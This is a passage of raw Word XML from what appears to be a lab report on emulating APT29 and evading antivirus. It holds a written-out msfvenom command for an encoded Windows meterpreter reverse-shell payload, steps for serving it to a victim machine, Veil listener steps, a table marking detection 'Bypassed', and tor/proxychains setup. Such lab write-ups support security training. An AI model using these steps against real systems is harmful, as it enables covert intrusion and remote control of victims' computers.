      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh Logs analysis: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh successfully flagged the APT29 emulation through Sysmon integration. High-severity alerts were triggered by T1547.001, detecting unauthorized registry modifications. Additionally, the SOC dashboard visualized anomalous PowerShell execution patterns, correlating the initial Evilginx2-driven login with the subsequent automated persistence scripts, providing a clearThis task moves from attacking a single server to simulating the behavior of a real-world threat actor like APT29 (Cozy Bear). This group is known for long-term persistence and sophisticated phishing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Evasion Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Evasion Techniques (AETs) are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sophisticated cyberattack methods that combine multiple, layered strategies—such as traffic fragmentation, protocol manipulation, and code obfuscation—to disguise malicious traffic and bypass security detection systems like IDS/IPS and firewalls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s a combination of msfpayload and msfencode, putting both of these tools into a single framework instance. Msfvenom has replaced both msfpayload and msfencode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Veil - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">an open-source framework in Kali Linux used by penetration testers to generate metasploit payloads that bypass common anti-virus (AV) solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains -  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s a powerful tool that forces any TCP-based program, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a web browser, to route its traffic through one or more proxies (SOCKS4/5 or HTTP) to mask the user's true IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encode a Metasploit payload with msfvenom to bypass AV </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6219825" cy="4876800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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6219825"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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s the command line interface of veil tool. Where we can list tools and use them according to our needs. But for now we have to use the msfvenom to create a reverse_tcp shell on which i am using kali linux as an attacker machine and windows as the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6840000" cy="1714500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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68400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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, using this command to make the obfuscated payload “m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;Your_IP&gt; LPORT=4444 -e x64/shikata_ga_nai -i 5 -f exe -o obfuscated_payload.exe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“. Next i will transfer the payload to the windows by using commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /var/www/html/share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod -R 755 /var/www/html/share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chown -R www-data:www-data /var/www/html/share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /home/attacker/obfuscated_payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To access this I have to go to windows and type the attacker ip/share like this in which i can download the file and execute it but before executing we have to put up a listener for which i will use veil.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Listener (Veil) and Network Evasion (proxychains)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run “veil” in the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type “use 1”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type “list” then we will use “use go/meterpreter/rev_tcp.py”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST is 172.25.0.10 and LPORT is 4444 as per our exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type “generate”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="1077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94.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AV Detection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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PID001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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter (Go/Shikata)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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Bypassed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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload encoded/wrapped: successfully executed without triggering static signature alerts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the proxy chains we have to start tor like “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl start tor</w:t>
      </w:r>
